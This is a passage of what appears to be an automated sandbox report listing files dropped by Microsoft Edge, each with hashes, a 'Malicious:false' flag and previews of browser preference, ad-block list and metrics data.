                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\0f52099d-ba90-42ad-9f59-35cbfeda87d1.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640139880887754
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7h:fwUQC5VwBIiElEd2K57P7h
                                                                                                                                                                                                                                                                                                                                                        MD5:7781A0DE57A3606D285D686A487FEB1B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5F702CBBA11E1AF5598DBC7A253A8D382D074ECB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF32BBA9E0B08B317F4E9A5DB38CE561C8BB13D337E41DCAB38AC85720F7EF0D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A185790DAFC4904EA7DD258947811D58F855DBCC6C0D8165C179DF3669B7A7D7EC792EC27FBE671EB9076717C841631928D8BC601EC90F705FE3EB9C876C9C2E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640139880887754
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7h:fwUQC5VwBIiElEd2K57P7h
                                                                                                                                                                                                                                                                                                                                                        MD5:7781A0DE57A3606D285D686A487FEB1B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5F702CBBA11E1AF5598DBC7A253A8D382D074ECB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF32BBA9E0B08B317F4E9A5DB38CE561C8BB13D337E41DCAB38AC85720F7EF0D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A185790DAFC4904EA7DD258947811D58F855DBCC6C0D8165C179DF3669B7A7D7EC792EC27FBE671EB9076717C841631928D8BC601EC90F705FE3EB9C876C9C2E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                                                                                        MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                                                                                        SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                                                                                        SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\09f3e7fa-8f76-468a-92fc-4d0171884ce4.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):38626
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5549808317669775
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:7rKOLL7pLGLpmIWPA+fkd8F1+UoAYDCx9Tuqh0VfUC9xbog/OV+EjeHrw2ifY+qr:7rKOLdcpmIWPA+fkdu1jaP0eU2ifY7sK
                                                                                                                                                                                                                                                                                                                                                        MD5:633743C66C287FA1C8AE26CAC4D3D24B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5E6F07062D677B1A795A714933BA3C3B1E0999C4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F11EDBCEB491F1978DF0BE0C310C68F26FBB1A6D972BAF11E9DA488D8E15FF58
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F26BF95F621A2DE8A1D155D056789D8E20DF5B7F4905C041A9747B7D3D5263DEB6574747AE352364476DD7D9CF8FD61467C237408151A25B85FA6CA3B877FD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376067971858364","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376067971858364","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3eaea767-9fd1-4c1e-a31a-358c645e5442.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17451), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17451
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.481490680623047
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:strPGQSu4MsbufhXoBIxxcInkobGXLQwK6WQlaTYj:stOXuAuffkobGUBOaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:95CC59E06D46D8276C9AAE66F0C730DE
                                                                                                                                                                                                                                                                                                                                                        SHA1:B72266989324218A0CCBC167C65A738AC895E312
                                                                                                                                                                                                                                                                                                                                                        SHA-256:85C924DB1E9A8682772533B7C92800D9281A14CA2CED716B44BF49433F584094
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8FB9D36B858A70CEC12CE749A7118F581366AF7D87E271C33BAA091BB2BA72996C78DE81357A575115ABDEA19C7FD74662A34971A3B0F59799E4052E32E21C46
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4a389d72-adfa-4239-9465-5335d9c36cc3.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17286), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17286
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.484814836528547
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:strPGQSu4MsbufhXoBIxxcInkobGXLQwK6WzaTYj:stOXuAuffkobGUB/aTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:F9A8033BC106485F14473A44E6E4ADE7
                                                                                                                                                                                                                                                                                                                                                        SHA1:FB5749FFADFDED1E8F69C6212426F72DBB3CA2F2
                                                                                                                                                                                                                                                                                                                                                        SHA-256:812065E457F3C7510BA6A35ED298E9DB11A5AA230433881CF893F324558CBC5C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:697A11A600C554B542E37CC091E861F90B7D3F15002C82FD0644E27BBCAF4DE35C086B6ED3CF29688BB9D60AC79E1DBA9C95822937CAD3B6F660BA2B30DBE7B9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4c5f21bf-f725-4f17-ae31-934efef70ecd.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5d2b3c92-98bc-47fb-bcf3-2946efc25e81.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7cd110c9-7d8a-484e-8823-d8f18844834e.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40470
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56139859910408
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:7rKOLL7pLGLpmIWPA+f7d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVNCDEjeHrw2iRU2:7rKOLdcpmIWPA+f7du1jaUCD0eU2iRU2
                                                                                                                                                                                                                                                                                                                                                        MD5:E6A568328D835665982229C80C39B1D8
                                                                                                                                                                                                                                                                                                                                                        SHA1:CC7DD59C8BCA8CCD5E884B9039EEBB33CABE7109
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A4E8A23D925D2957A211C1961FDB3D6C1C947A67D7E4DE792D46178B45D7708B
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A0C00B1F368C2891ADAE709615E4345C82677975B42D0314276E77FF4825DDA21C870B89875F1197D944447671F5A3DA70DF3F307F4BD6740269EB64D2279AEB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376067971858364","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376067971858364","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8ec73e67-a32a-474d-8f37-a36390d5f222.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16696), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16696
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.441923466839279
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:strPGQSu4MsbufhgxxcInkobGXLQwK6WpaTYj:stOXuAufQkobGUBVaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:E242023FED2F033865FB29C260F58D4E
                                                                                                                                                                                                                                                                                                                                                        SHA1:D05CA7CCBEEFC972C329ED831FA2B9E4C0D76215
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BC376987A4399077A16133F78E3A14948D9B76ED3436B9598EDCDA95141D70C9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4CFCA2F38B3DA3E3D85B2311F5DC7D8360D9DC50BA549489D49BD10ECC6345ED3BAB4B823E91D53DEFD548971CBD1E5A4A0DBB3DBB0695B3825FBAFA0B7F9DC1
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
